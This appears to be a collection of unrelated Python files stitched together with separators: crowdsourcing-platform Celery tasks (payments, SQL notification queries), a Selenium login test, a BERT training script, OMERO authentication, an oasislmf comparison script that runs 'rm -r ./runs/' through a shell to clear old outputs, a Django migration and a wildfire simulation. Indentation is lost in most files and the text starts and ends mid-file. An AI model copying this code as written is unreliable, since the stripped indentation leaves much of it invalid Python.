.order_by('-id').first()
previous_batch_file = previous_rev.batch_files.first() if previous_rev else None
models.Task.objects.filter(project=project).delete()
if file_deleted:
models.Task.objects.filter(project=project).delete()
task_data = {
"project_id": project_id,
"data": {}
}
task = models.Task.objects.create(**task_data)
if previous_batch_file is None and previous_rev is not None:
task.group_id = previous_rev.tasks.all().first().group_id
else:
task.group_id = task.id
task.save()
# price_data = models.Task.objects.filter(project_id=project_id, price__isnull=False).values_list('price',
# flat=True)
_set_aux_attributes(project, [])
return 'SUCCESS'
try:
with transaction.atomic():
data = project.batch_files.first().parse_csv()
task_obj = []
x = 0
previous_tasks = previous_rev.tasks.all().order_by('row_number') if previous_batch_file else []
previous_count = len(previous_tasks)
for row in data:
x += 1
hash_digest = hash_task(row)
price = None
if project.allow_price_per_task and project.task_price_field is not None:
price = row.get(project.task_price_field)
t = models.Task(data=row, hash=hash_digest, project_id=int(project_id), row_number=x, price=price)
if previous_batch_file is not None and x <= previous_count:
if len(set(row.items()) ^ set(previous_tasks[x - 1].data.items())) == 0:
t.group_id = previous_tasks[x - 1].group_id
task_obj.append(t)
models.Task.objects.bulk_create(task_obj)
price_data = models.Task.objects.filter(project_id=project_id, price__isnull=False).values_list('price',
flat=True)
_set_aux_attributes(project, price_data)
models.Task.objects.filter(project_id=project_id, group_id__isnull=True) \
.update(group_id=F('id'))
except Exception as e:
self.retry(countdown=4, exc=e, max_retries=2)
return 'SUCCESS'
def _set_aux_attributes(project, price_data):
if project.aux_attributes is None:
project.aux_attributes = {}
if not len(price_data):
max_price = float(project.price)
min_price = float(project.price)
median_price = float(project.price)
else:
max_price = float(np.max(price_data))
min_price = float(np.min(price_data))
median_price = float(np.median(price_data))
project.aux_attributes.update({"min_price": min_price, "max_price": max_price, "median_price": median_price})
project.save()
@celery_app.task(ignore_result=True)
def pay_workers():
workers = User.objects.all()
payment = Stripe()
# total = 0
#
for worker in workers:
task_workers = models.TaskWorker.objects.prefetch_related('task__project') \
.filter(worker=worker,
status=models.TaskWorker.STATUS_ACCEPTED,
is_paid=False)
for tw in task_workers:
payment.pay_worker(tw)
def single_payout(amount, user):
return 'OBSOLETE METHOD'
@celery_app.task(ignore_result=True)
def post_approve(task_id, num_workers):
task = models.Task.objects.prefetch_related('project').get(pk=task_id)
latest_revision = models.Project.objects.filter(~Q(status=models.Project.STATUS_DRAFT),
group_id=task.project.group_id) \
.order_by('-id').first()
latest_revision.amount_due -= Decimal(num_workers * latest_revision.price)
latest_revision.save()
return 'SUCCESS'
def create_transaction(sender_id, recipient_id, amount, reference):
return 'OBSOLETE METHOD'
@celery_app.task(ignore_result=True)
def refund_task(task_worker_in):
return 'OBSOLETE METHOD'
@celery_app.task(ignore_result=True)
def update_feed_boomerang():
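    # Gradually lower the boomerang minimum rating of long-running in-progress
    # projects so more workers become eligible, then email eligible workers who
    # have not yet been notified about projects with available tasks.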
logs = []
cursor = connection.cursor()
last_update = timezone.now() - timedelta(minutes=settings.HEART_BEAT_BOOMERANG)
projects = models.Project.objects.filter(status=models.Project.STATUS_IN_PROGRESS,
min_rating__gt=1.0,
enable_boomerang=True,
rating_updated_at__lt=last_update)
for project in projects:
if project.min_rating == 3.0:
project.min_rating = 2.0
project.previous_min_rating = 3.0
elif project.min_rating == 2.0:
project.min_rating = 1.99
project.previous_min_rating = 2.0
elif project.min_rating == 1.99:
project.min_rating = 1.0
project.previous_min_rating = 1.99
project.rating_updated_at = timezone.now()
project.save()
logs.append(
models.BoomerangLog(object_id=project.group_id, min_rating=project.min_rating,
rating_updated_at=project.rating_updated_at,
reason='DEFAULT'))
# noinspection SqlResolve
email_query = '''
SELECT
available.id,
available.group_id,
owner_profile.handle,
u_workers.id,
sum(available) available_count,
u_workers.email,
available.name,
coalesce((available.aux_attributes ->> 'median_price') :: NUMERIC, available.price)
FROM (
SELECT
p.id,
p.group_id,
p.name,
owner_id,
p.min_rating,
p.price,
p.aux_attributes,
sum(1) available
FROM crowdsourcing_task t
INNER JOIN (SELECT
group_id,
max(id) id
FROM crowdsourcing_task
WHERE deleted_at IS NULL
GROUP BY group_id) t_max ON t_max.id = t.id
INNER JOIN crowdsourcing_project p ON p.id = t.project_id
INNER JOIN (
SELECT
t.group_id,
sum(t.done) done
FROM (
SELECT
t.group_id,
CASE WHEN (tw.worker_id IS NOT NULL)
AND tw.status NOT IN (4, 6, 7)
THEN 1
ELSE 0 END done
FROM crowdsourcing_task t
LEFT OUTER JOIN crowdsourcing_taskworker tw ON t.id = tw.task_id
WHERE t.exclude_at IS NULL AND t.deleted_at IS NULL) t
GROUP BY t.group_id)
t_count ON t_count.group_id = t.group_id AND t_count.done < p.repetition
WHERE p.status = 3 AND p.deleted_at IS NULL
GROUP BY p.id, p.name, owner_id, p.min_rating, p.group_id, p.price, aux_attributes) available
INNER JOIN auth_user u_workers ON TRUE
INNER JOIN crowdsourcing_userprofile p_workers ON p_workers.user_id = u_workers.id
AND p_workers.is_worker IS TRUE
INNER JOIN get_worker_ratings(u_workers.id) worker_ratings
ON worker_ratings.requester_id = available.owner_id
AND (coalesce(worker_ratings.worker_rating, 1.99) >= available.min_rating)
LEFT OUTER JOIN crowdsourcing_WorkerProjectNotification n
ON n.project_id = available.group_id AND n.worker_id = u_workers.id
INNER JOIN crowdsourcing_userpreferences pref ON pref.user_id = u_workers.id
INNER JOIN auth_user owner ON owner.id = available.owner_id
INNER JOIN crowdsourcing_userprofile owner_profile ON owner_profile.user_id = owner.id
LEFT OUTER JOIN (
SELECT
p.id,
tw.worker_id,
count(tw.id) tasks_done
FROM crowdsourcing_project p
INNER JOIN crowdsourcing_task t ON p.id = t.project_id
LEFT OUTER JOIN crowdsourcing_taskworker tw ON tw.task_id = t.id
GROUP BY p.id, tw.worker_id
) worker_project ON worker_project.id = available.id
AND worker_project.worker_id = u_workers.id
WHERE n.id IS NULL AND pref.new_tasks_notifications = TRUE AND coalesce(worker_project.tasks_done, 0) = 0
GROUP BY available.id, available.group_id, owner_profile.handle, u_workers.id, u_workers.email, available.name,
available.price, available.aux_attributes;
'''
try:
cursor.execute(email_query, {})
workers = cursor.fetchall()
worker_project_notifications = []
for worker in workers:
try:
send_new_tasks_email(to=worker[5], project_id=worker[0],
project_name=worker[6], price=worker[7],
available_tasks=worker[4], requester_handle=worker[2])
worker_project_notifications.append(models.WorkerProjectNotification(project_id=worker[1],
worker_id=worker[3]))
except Exception as e:
print(e)
models.WorkerProjectNotification.objects.bulk_create(worker_project_notifications)
except Exception as e:
print(e)
cursor.close()
# for task in tasks:
# logs.append(models.BoomerangLog(object_id=task[1], min_rating=task[2], object_type='task',
# rating_updated_at=task[3],
# reason='DEFAULT'))
models.BoomerangLog.objects.bulk_create(logs)
return 'SUCCESS: {} rows affected'.format(cursor.rowcount)
@celery_app.task(ignore_result=True)
def update_project_boomerang(project_id):
project = models.Project.objects.filter(pk=project_id).first()
if project is not None:
project.min_rating = 3.0
# project.rating_updated_at = timezone.now()
project.save()
models.BoomerangLog.objects.create(object_id=project.group_id, min_rating=project.min_rating,
rating_updated_at=project.rating_updated_at, reason='RESET')
return 'SUCCESS'
@celery_app.task
def background_task(function, **kwargs):
function(**kwargs)
return 'SUCCESS'
# Payment Tasks
@celery_app.task(ignore_result=True)
def create_account_and_customer(user_id, ip_address):
from crowdsourcing.payment import Stripe
try:
user = User.objects.get(pk=user_id)
Stripe().create_account_and_customer(user=user, country_iso=user.profile.address.city.country.code,
ip_address=ip_address)
except User.DoesNotExist:
return 'User does not exist'
return 'SUCCESS'
@celery_app.task(ignore_result=True)
def refund_charges_before_expiration():
from crowdsourcing.payment import Stripe
charges = models.StripeCharge.objects.filter(expired=False, balance__gt=50,
created_at__gt=timezone.now() - settings.STRIPE_CHARGE_LIFETIME)
for charge in charges:
try:
Stripe().refund(charge=charge, amount=charge.balance)
charge.expired = True
charge.expired_at = timezone.now()
charge.save()
except Exception:
pass
@celery_app.task(ignore_result=True)
def notify_workers(project_id, worker_ids, subject, message):
project = models.Project.objects.values('owner').get(id=project_id)
user = User.objects.get(id=project['owner'])
provider = get_provider(user)
if provider is None:
return
provider.notify_workers(worker_ids=worker_ids, subject=subject, message_text=message)
return 'SUCCESS'
@celery_app.task(ignore_result=True)
def send_return_notification_email(return_feedback_id, reject=False):
feedback = models.ReturnFeedback.objects.prefetch_related('task_worker', 'task_worker__worker',
'task_worker__task__project',
'task_worker__task__project__owner__profile').get(
id=return_feedback_id)
if not feedback.notification_sent:
if not reject:
send_task_returned_email(to=feedback.task_worker.worker.email,
requester_handle=feedback.task_worker.task.project.owner.profile.handle,
project_name=feedback.task_worker.task.project.name[:32],
task_id=feedback.task_worker.task_id,
return_reason=feedback.body,
requester_email=feedback.task_worker.task.project.owner.email)
else:
send_task_rejected_email(to=feedback.task_worker.worker.email,
requester_handle=feedback.task_worker.task.project.owner.profile.handle,
project_name=feedback.task_worker.task.project.name[:32],
task_id=feedback.task_worker.task_id,
reject_reason=feedback.body,
requester_email=feedback.task_worker.task.project.owner.email)
feedback.notification_sent = True
feedback.notification_sent_at = timezone.now()
feedback.save()
@celery_app.task(ignore_result=True)
def check_project_completed(project_id):
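    # Count task groups that still need submissions; when none remain, either
    # relaunch a prototype project as a full revision (if feedback allows) or
    # email the owner that the project is complete.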
query = '''
SELECT
count(t.id) remaining
FROM crowdsourcing_task t INNER JOIN (SELECT
group_id,
max(id) id
FROM crowdsourcing_task
WHERE deleted_at IS NULL
GROUP BY group_id) t_max ON t_max.id = t.id
INNER JOIN crowdsourcing_project p ON p.id = t.project_id
INNER JOIN (
SELECT
t.group_id,
sum(t.others) OTHERS
FROM (
SELECT
t.group_id,
CASE WHEN tw.id IS NOT NULL THEN 1 ELSE 0 END OTHERS
FROM crowdsourcing_task t
LEFT OUTER JOIN crowdsourcing_taskworker tw
ON (t.id = tw.task_id AND tw.status NOT IN (4, 6, 7))
WHERE t.exclude_at IS NULL AND t.deleted_at IS NULL) t
GROUP BY t.group_id) t_count ON t_count.group_id = t.group_id
WHERE t_count.others < p.repetition AND p.id=(%(project_id)s)
GROUP BY p.id;
'''
params = {
"project_id": project_id
}
cursor = connection.cursor()
cursor.execute(query, params)
remaining_count = cursor.fetchall()[0][0] if cursor.rowcount > 0 else 0
print(remaining_count)
if remaining_count == 0:
with transaction.atomic():
project = models.Project.objects.select_for_update().get(id=project_id)
if project.is_prototype:
feedback = project.comments.all()
if feedback.count() > 0 and feedback.filter(ready_for_launch=True).count() / feedback.count() < 0.66:
# mandatory stop
pass
else:
from crowdsourcing.serializers.project import ProjectSerializer
from crowdsourcing.viewsets.project import ProjectViewSet
needs_workers = project.repetition < project.aux_attributes.get('repetition', project.repetition)
                    needs_tasks = project.tasks.filter(exclude_at__isnull=True).count() < project.aux_attributes.get(
                        'number_of_tasks')
if needs_workers or needs_tasks:
serializer = ProjectSerializer()
revision = ProjectSerializer.create_revision(project)
revision.repetition = revision.aux_attributes.get('repetition', project.repetition)
revision.is_prototype = False
revision.save()
serializer.create_tasks(revision.id, False)
total_needed = ProjectViewSet.calculate_total(revision)
to_pay = (Decimal(total_needed) - revision.amount_due).quantize(Decimal('.01'),
rounding=ROUND_UP)
revision.amount_due = total_needed if total_needed is not None else 0
if to_pay * 100 > revision.owner.stripe_customer.account_balance:
return 'FAILED'
else:
serializer = ProjectSerializer(instance=revision, data={})
if serializer.is_valid():
serializer.publish(to_pay)
return 'SUCCESS'
else:
send_project_completed(to=project.owner.email, project_name=project.name, project_id=project_id)
return 'SUCCESS'
@celery_app.task(ignore_result=True)
def post_to_discourse(project_id):
from crowdsourcing.discourse import DiscourseClient
instance = models.Project.objects.get(id=project_id)
aux_attrib = instance.aux_attributes
if 'median_price' in aux_attrib:
price = aux_attrib['median_price']
if price is not None and float(price) > 0:
price = float(price)
else:
price = instance.price
else:
price = instance.price
# post topic as system user
client = DiscourseClient(
settings.DISCOURSE_BASE_URL,
api_username='system',
api_key=settings.DISCOURSE_API_KEY)
if instance.discussion_link is None:
try:
topic = client.create_topic(title=instance.name,
category=settings.DISCOURSE_TOPIC_TASKS,
timeout=instance.timeout,
price=price,
requester_handle=instance.owner.profile.handle,
project_id=project_id)
if topic is not None:
url = '/t/%s/%d' % (topic['topic_slug'], topic['topic_id'])
instance.discussion_link = url
instance.topic_id = topic['topic_id']
instance.post_id = topic['id']
instance.save()
# watch as requester
client = DiscourseClient(
settings.DISCOURSE_BASE_URL,
api_username=instance.owner.profile.handle,
api_key=settings.DISCOURSE_API_KEY)
client.watch_topic(topic_id=topic['topic_id'])
except Exception as e:
print(e)
            print('failed to create or watch topic')
else:
# handle if any details changed and update first post again
if instance.topic_id > 0 and instance.post_id > 0:
preview_url = "%s/task-feed/%d" % (settings.SITE_HOST, project_id)
content = "**Title**: [%s](%s) \n" \
"**Requester**: @%s\n" \
"**Price** : USD %.2f \n" \
"**Timeout** : %s \n" % (instance.name, preview_url, instance.owner.profile.handle, price,
instance.timeout)
try:
client.update_post(
post_id=instance.post_id,
edit_reason='updating project parameters',
content=content)
except Exception as e:
print(e)
                print('failed to update post')
|
import unittest
import os
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from test.browser import getDriver
from app import app
from app.model.user import User
app_url = app.config.get('APP_URL')
app_port = app.config.get('APP_PORT')
app_domain = f'{app_url}:{app_port}'
class TestLoginPage(unittest.TestCase):
def setUp(self):
print('Testing login page..')
os.system('flask db:fresh')
self.driver = webdriver.Chrome()
def tearDown(self):
os.system('flask db:fresh')
self.driver.quit()
def test_login(self):
#self.driver.implicitly_wait(10)
self.driver.get(f'{app_domain}/login')
user = User()
user.username = 'Example'
user.email = 'example@gmail.com'
user.password = 'examplepassword'
user.user_id = 32
user.save()
email = self.driver.find_element_by_name('user_email')
password = self.driver.find_element_by_name('pass')
email.send_keys('example@gmail.com')
password.send_keys('examplepassword')
submit_button = self.driver.find_element_by_id('submit_button')
submit_button.send_keys(Keys.ENTER)
current_url = self.driver.current_url
self.assertEqual(current_url, f'{app_domain}/')
if __name__ == '__main__':
unittest.main()
|
import config
import dataset
import os
import engine
import torch
import utils
import params
import sandesh
import pandas as pd
import torch.nn as nn
import numpy as np
from torch.optim import lr_scheduler
from model import TweetModel
from sklearn import model_selection
from sklearn import metrics
import transformers
from transformers import AdamW
from transformers import get_linear_schedule_with_warmup
from apex import amp
def run(fold):
dfx = pd.read_csv(config.TRAINING_FILE)
df_train = dfx[dfx.kfold != fold].reset_index(drop=True)
df_valid = dfx[dfx.kfold == fold].reset_index(drop=True)
print(df_train.shape)
print(df_valid.shape)
train_dataset = dataset.TweetDataset(
tweet=df_train.text.values,
sentiment=df_train.sentiment.values,
selected_text=df_train.selected_text.values
)
train_data_loader = torch.utils.data.DataLoader(
train_dataset,
batch_size=config.TRAIN_BATCH_SIZE,
num_workers=4
)
valid_dataset = dataset.TweetDataset(
tweet=df_valid.text.values,
sentiment=df_valid.sentiment.values,
selected_text=df_valid.selected_text.values
)
valid_data_loader = torch.utils.data.DataLoader(
valid_dataset,
batch_size=config.VALID_BATCH_SIZE,
num_workers=2
)
device = torch.device("cuda")
model_config = transformers.BertConfig.from_pretrained(config.BERT_PATH)
model_config.output_hidden_states = True
model = TweetModel(conf=model_config)
model.to(device)
num_train_steps = int(len(df_train) / config.TRAIN_BATCH_SIZE * config.EPOCHS)
optimizer = AdamW(params.optimizer_params(model), lr=5e-5)
scheduler = get_linear_schedule_with_warmup(optimizer, num_warmup_steps=0, num_training_steps=num_train_steps)
model, optimizer = amp.initialize(model, optimizer, opt_level="O1", verbosity=0)
es = utils.EarlyStopping(patience=5, mode="max")
sandesh.send("Training is Starting")
for epoch in range(config.EPOCHS):
engine.train_fn(train_data_loader, model, optimizer, device, scheduler=scheduler)
jaccard = engine.eval_fn(valid_data_loader, model, device)
print(f"Jaccard Score = {jaccard}")
sandesh.send(f"Epoch={epoch}, Jaccard={jaccard}")
es(jaccard, model, model_path=f"model_{fold}.bin")
if es.early_stop:
print("Early stopping")
break
if __name__ == "__main__":
FOLD = int(os.environ.get("FOLD"))
run(fold=FOLD)
|
"""Use an omero server to authenticate user and gather group info
This is heavily inspired by https://flask-ldap3-login.readthedocs.io/
"""
import logging
import omero
from flask_ldap3_login import AuthenticationResponseStatus
from omero.gateway import BlitzGateway
from enum import Enum
log = logging.getLogger(__name__)
class AuthenticationResponse:
"""
A response object when authenticating. Lets us pass status codes around
and also user data.
Args:
status (AuthenticationResponseStatus): The status of the result.
user_info (dict): User info dictionary obtained from omero.
"""
# From flask-ldap3-login, thanks
def __init__(
self,
status=AuthenticationResponseStatus.fail,
user_info=None,
):
self.user_info = user_info
self.status = status
class OmeroLoginManager:
def __init__(self, app=None):
self.app = app
self.config = {}
self._save_user = None
if app is not None:
self.init_app(app)
def init_app(self, app):
"""Configures this extension with the given app. This registers a
``teardown_appcontext`` call, and attaches this ``OmeroLoginManager``
to it as ``app.omero_login_manager``.
Args:
app (flask.Flask): The flask app to initialise with
"""
app.omero_login_manager = self
self.init_config(app.config)
def init_config(self, config):
"""
Configures this extension with a given configuration dictionary.
This allows use of this extension without a flask app.
Args:
config (dict): A dictionary with configuration keys
"""
self.config.update(config)
self.config.setdefault("OMERO_PORT", 4064)
self.config.setdefault("OMERO_HOST", "localhost")
log.info(
"Setting omero host to %s:%d",
self.config["OMERO_HOST"],
self.config["OMERO_PORT"],
)
def authenticate(self, username, password):
client = omero.client(
host=self.config["OMERO_HOST"], port=self.config["OMERO_PORT"]
)
session = client.createSession(username, password)
with BlitzGateway(client_obj=client) as conn:
if conn.isConnected():
log.info("succesfully connected to OMERO")
response = AuthenticationResponse(
status=AuthenticationResponseStatus.success,
user_info=self.get_user_info(conn),
)
else:
response = AuthenticationResponse(
status=AuthenticationResponseStatus.fail, user_info={}
)
return response
def get_user_info(self, conn):
user = conn.getUser()
info = {
"username": user.getName(),
"fullname": user.getFullName(),
"groupname": conn.getGroupFromContext().getName(),
"groups": [g.getName() for g in conn.getGroupsMemberOf()],
}
log.info("Found user info: %s", info)
return info
def save_user(self, callback):
"""
        This sets the callback for saving a user that has been looked up
        from OMERO.
The function you set should take a user dn (unicode), username
(unicode) and userdata (dict), and memberships (list).
::
@ldap3_manager.save_user
def save_user(dn, username, userdata, memberships):
return User(username=username, data=userdata)
Your callback function MUST return the user object in your ORM
(or similar). as this is used within the LoginForm and placed
at ``form.user``
Args:
callback (function): The function to be used as the save user
callback.
"""
self._save_user = callback
return callback
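# Illustrative usage sketch (the `app` object and the credentials below are
# hypothetical, not part of this module):
#
#     login_manager = OmeroLoginManager(app)
#     response = login_manager.authenticate("alice", "secret")
#     if response.status == AuthenticationResponseStatus.success:
#         print(response.user_info["groups"])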
|
from plugins import moderation
from plugins import tournaments
from plugins import messages
from plugins import workshop
from plugins.games import *
|
import json
import os
from pathlib import Path
from subprocess import Popen
from typing import Dict
import pandas as pd
mdk_config = {
"analysis_settings_json": "analysis_settings.json",
"lookup_data_dir": "keys_data",
"lookup_module_path": "src/keys_server/ParisWindstormKeysLookup.py",
"model_data_dir": "model_data",
"model_version_csv": "keys_data/ModelVersion.csv",
"oed_accounts_csv": "tests/account.csv",
"oed_location_csv": "tests/location.csv",
"hashed_group_id": True
}
def get_recent_run_path() -> str:
path_string: str = str(Path.cwd()) + "/runs/"
path = Path(path_string)
for directory in [str(f) for f in path.iterdir() if f.is_dir()]:
if "losses" in directory:
return directory
def rename_directory(directory_path: str, new_file_name: str) -> str:
buffer = directory_path.split("/")
buffer[-1] = new_file_name
new_path: str = "/".join(buffer)
os.rename(directory_path, new_path)
return new_path
def get_output_files(run_directory: str) -> Dict[str, str]:
output_path: str = run_directory + "/output/"
output = dict()
output["gul_S1_aalcalc.csv"] = output_path + "gul_S1_aalcalc.csv"
output["gul_S1_eltcalc.csv"] = output_path + "gul_S1_eltcalc.csv"
output["gul_S1_leccalc_full_uncertainty_aep.csv"] = output_path + "gul_S1_leccalc_full_uncertainty_aep.csv"
output["gul_S1_leccalc_full_uncertainty_oep.csv"] = output_path + "gul_S1_leccalc_full_uncertainty_oep.csv"
output["gul_S1_summary-info.csv"] = output_path + "gul_S1_summary-info.csv"
output["il_S1_aalcalc.csv"] = output_path + "il_S1_aalcalc.csv"
output["il_S1_eltcalc.csv"] = output_path + "il_S1_eltcalc.csv"
output["il_S1_leccalc_full_uncertainty_aep.csv"] = output_path + "il_S1_leccalc_full_uncertainty_aep.csv"
output["il_S1_leccalc_full_uncertainty_oep.csv"] = output_path + "il_S1_leccalc_full_uncertainty_oep.csv"
output["il_S1_summary-info.csv"] = output_path + "il_S1_summary-info.csv"
return output
def compare_data(hash_output_dict: Dict[str, str], none_hash_output_dict: Dict[str, str], key: str) -> None:
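    # Load the same output CSV from both runs and report rows that appear in only
    # one of them (concatenating and dropping duplicates keeps non-matching rows).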
hash_data_path: str = hash_output_dict[key]
none_hash_data_path: str = none_hash_output_dict[key]
hash_df = pd.read_csv(hash_data_path, index_col=False)
non_hash_df = pd.read_csv(none_hash_data_path, index_col=False)
difference = pd.concat([hash_df, non_hash_df]).drop_duplicates(keep=False)
print(f"left number is {len(hash_df)} right number is {len(non_hash_df)}")
if len(difference) > 0:
print(f"the difference between hash and none hash for {key} is {len(difference)}")
print(difference.head())
else:
print(f"there is no difference between hash and none hash for {key}")
def generate_location_data(remove_location: bool = False) -> pd.DataFrame:
data = [
[1,1,1,"Hotel Ronceray Opera",48.874979,2.30887,5150,1000000,0,0,0,"WTC","EUR","FR",10000,500000],
[1,1,2,"Gare Du Nord",48.876918,2.324729,5050,2000000,0,0,0,"WTC","EUR","FR",25000,1000000],
[1,1,3,"Art Supply Store",48.85324,2.387931,5150,500000,0,0,0,"WTC","EUR","FR",0,0]
]
if remove_location is True:
data = data[1:]
columns = [
"PortNumber","AccNumber","LocNumber","LocName","Latitude","Longitude","ConstructionCode","BuildingTIV",
"OtherTIV","ContentsTIV","BITIV","LocPerilsCovered","LocCurrency","CountryCode","LocDed6All","LocLimit6All"
]
df = pd.DataFrame(data, columns=columns)
return df
if __name__ == "__main__":
# cleanup the previous runs
main_path: str = str(Path.cwd())
remove_runs = Popen(f"rm -r ./runs/", shell=True)
remove_runs.wait()
# setup the datasets for locations
# "oed_location_csv": "tests/location.csv"
locations = generate_location_data()
reduced_locations = generate_location_data(remove_location=True)
# write the location data
locations.to_csv("./tests/full_locations.csv", index=False)
reduced_locations.to_csv("./tests/reduced_locations.csv", index=False)
mdk_config["oed_location_csv"] = "tests/full_locations.csv"
# update the local oasislmf pip module
update_oasislmf = Popen("screw-update-local-oasislmf")
update_oasislmf.wait()
# write the new MDK config
with open(f"./hash_test_mdk.json", "w") as file:
file.write(json.dumps(mdk_config))
run_model = Popen(f"oasislmf model run --config ./hash_test_mdk.json", shell=True)
run_model.wait()
hash_run_path: str = rename_directory(directory_path=get_recent_run_path(), new_file_name="full_location_run")
mdk_config["oed_location_csv"] = "tests/reduced_locations.csv"
with open(f"./none_hash_test_mdk.json", "w") as file:
file.write(json.dumps(mdk_config))
run_model = Popen(f"oasislmf model run --config ./none_hash_test_mdk.json", shell=True)
run_model.wait()
none_hash_run_path: str = rename_directory(directory_path=get_recent_run_path(), new_file_name="reduced_locations_run")
hashed_outputs = get_output_files(run_directory=hash_run_path)
none_hashed_outputs = get_output_files(run_directory=none_hash_run_path)
for key in hashed_outputs.keys():
compare_data(hash_output_dict=hashed_outputs, none_hash_output_dict=none_hashed_outputs, key=key)
os.remove(f"./hash_test_mdk.json")
os.remove(f"./none_hash_test_mdk.json")
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
('auth', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='FacebookUser',
fields=[
('user_ptr', models.OneToOneField(serialize=False, primary_key=True, to=settings.AUTH_USER_MODEL, auto_created=True)),
('user_id', models.BigIntegerField(unique=True)),
('scope', models.CharField(default='', max_length=512, blank=True)),
('app_friends', models.ManyToManyField(to='facebook_auth.FacebookUser')),
],
options={
'verbose_name': 'user',
'abstract': False,
'verbose_name_plural': 'users',
},
bases=('auth.user',),
),
migrations.CreateModel(
name='UserToken',
fields=[
('id', models.AutoField(serialize=False, verbose_name='ID', auto_created=True, primary_key=True)),
('provider_user_id', models.CharField(max_length=255)),
('token', models.TextField(unique=True)),
('granted_at', models.DateTimeField(auto_now_add=True)),
('expiration_date', models.DateTimeField(default=None, null=True, blank=True)),
('deleted', models.BooleanField(default=False)),
],
options={
'verbose_name': 'User token',
'verbose_name_plural': 'User tokens',
},
bases=(models.Model,),
),
]
|
__version__ = "0.0.4"
__author__ = 'Mario Duran-Vega'
__credits__ = 'QOSF'
from .q_simulator import *
|
from typing import Any, Dict
import tqdm
from pytools.pytorch import distributed
from pytools.pytorch.engines.callbacks import Callback
from pytools.pytorch.summary import Summary
from pytools.pytorch.typing import Engine
from pytools.pyutils.logging.group import LogGroup, global_group
from pytools.pyutils.logging.handler import CallbackHandler
from pytools.pyutils.misc.string import WildCardMatcher
__all__ = ['ShowEpochProgress']
class ShowEpochProgress(Callback):
def __init__(
self,
summary: Summary,
matcher: WildCardMatcher = WildCardMatcher("*"),
*,
logger_group: LogGroup = global_group,
num_digits: int = 3,
console_handler_key: str = "__default_console__"
):
self._bar = None
self._logger_group = logger_group
self._num_digits = num_digits
self._console_handler_key = console_handler_key
self._context = None
self._summary = summary
self._matcher = matcher
def prior_epoch(self, engine, data_loader):
if distributed.is_local_master():
self._bar = tqdm.tqdm(total=len(data_loader), ncols=0, leave=False)
self._context = self._logger_group.switch_handler_context(
self._console_handler_key, CallbackHandler(self._bar.write))
self._context.__enter__()
def after_batch(self, engine: Engine, inputs: Dict[str, Any], outputs: Dict[str, Any]):
if distributed.is_local_master():
texts = []
for name in sorted(self._summary.names()):
if self._matcher.match(name) and self._summary[name].indices[-1] == engine.global_step:
texts.append(f'[{name}] = {self._summary[name].get_value():.{self._num_digits}g}')
if texts:
self._bar.set_description(', '.join(texts))
self._bar.update()
def after_epoch(self, engine, data_loader):
if distributed.is_local_master():
self._bar.close()
self._bar = None
self._context.__exit__(None, None, None)
self._context = None
|
from .interface import Interface
__all__ = [
'Interface',
]
|
# coding=utf-8
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
|
"""
Author : Abraham Flores
File : MCWildFire.py
Language : Python 3.5
Created : 12/7/2017
Edited : 12/18/2017
San Diego State University
MTH 636 : Mathematical Modeling
"""
import math,random,os,glob
from random import shuffle
from scipy.stats import uniform
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import seaborn as sns
import numpy as np
class Forestry:
def __init__(self,name_,fuel_,moisture_=0,wind_=0,elevation_=0):
self.name = name_
self.fuel = fuel_
self.moisture = moisture_
self.wind = wind_
self.elevation = elevation_
self.burning = False
self.putout = False
self.transistionSPECIES = ''
self.transistionTIME = 1
def __str__(self):
return "Species: " + self.name
def __repr__(self):
return "Species: " + self.name
def SetTransistion(self,name_,time_):
self.transistionSPECIES = name_
self.transistionTIME = time_
def GetSpecies(self):
return self.name
def GetNext(self):
return self.transistionSPECIES
def Update(self):
self.transistionTIME -= 1
def Transistion(self,name_,fuel_):
self.name = name_
self.fuel = fuel_
self.burning = False
self.putout = False
def Pburn(self,weights_=[1,0,0,0],intensity=1):
if self.putout or self.fuel == 0:
return 0
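        # Burn probability is P = (1 - exp(-K)) ** intensity, where K is a weighted
        # sum of fuel, moisture, wind and elevation. For example, with the default
        # weights [1, 0, 0, 0] and fuel ~12.4, K ~ 12.4 and P is essentially 1.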
K = weights_[0]*self.fuel + weights_[1]*self.moisture + \
weights_[2]*self.wind + weights_[3]*self.elevation
        probability_of_burn = (1-math.exp(-K))**intensity
        return probability_of_burn
def SetOnFire(self):
self.burning = True
def Extinguished(self):
self.burning = False
self.putout = True
def UpdateElevation(self,elevation_):
self.elevation = elevation_
def UpdateWeather(self,moisture_,wind_):
self.moisture = moisture_
self.wind = wind_
def Burned(self):
self.name = "Burned"
self.fuel = 0
self.moisture = 0
self.wind = 0
self.elevation = 0
self.burning = False
class Forest:
def __init__(self,N_,ecosystem,weights_=[1,0,0,0]):
self.grid = []
self.N = N_
self.onFIRE = False
self.weights = weights_
self.names = []
self.fuels = dict()
self.distribution = dict()
self.SetWeatherFunc()
self.SetWildFireProb()
temp = []
for plant in ecosystem:
self.names.append(plant[0])
self.fuels[plant[0]] = plant[2]
self.distribution[plant[0]] = plant[1]
for i in range(plant[1]):
temp.append(Forestry(plant[0],plant[2]))
shuffle(temp)
shuffle(temp)
shuffle(temp)
for i in range(N_):
self.grid.append(temp[i*N_:(i+1)*N_])
self.SpeciesLocations = dict()
for name in self.names:
self.SpeciesLocations[name] = []
self.TransistionNames = \
{"Oak":["Transistion"],\
"Transistion":["Oak","Pine","Deciduous"],\
"Pine":["Transistion","Deciduous"],\
"Deciduous":["Transistion","Pine"],\
"Shrubland":["Oak","Pine","Deciduous","Transistion"],\
"Burned" :["Shrubland"]}
self.TransistionTimes = \
{"Shrubland":{"Pine":13,"Transistion":15,"Deciduous":13,"Oak":40},\
"Transistion":{"Pine":25,"Deciduous":23,"Oak":35},\
"Pine":{"Transistion":28,"Deciduous":20,},\
"Deciduous":{"Pine":25,"Transistion":35},\
"Oak":{"Transistion":30},\
"Burned":{"Shrubland":3}}
for x in range(N_):
for y in range(N_):
self.SpeciesLocations[self.grid[x][y].GetSpecies()].append((x,y))
nXt = self.NextState(x,y)
self.grid[x][y].SetTransistion(nXt,self.TransistionTimes[self.grid[x][y].name][nXt])
def CoefficentOfTransisiton(self,x,y,name):
if not (len(self.SpeciesLocations[name])):
return 0
        # find all cells of the given species in the grid
dist = []
for x_ , y_ in self.SpeciesLocations[name]:
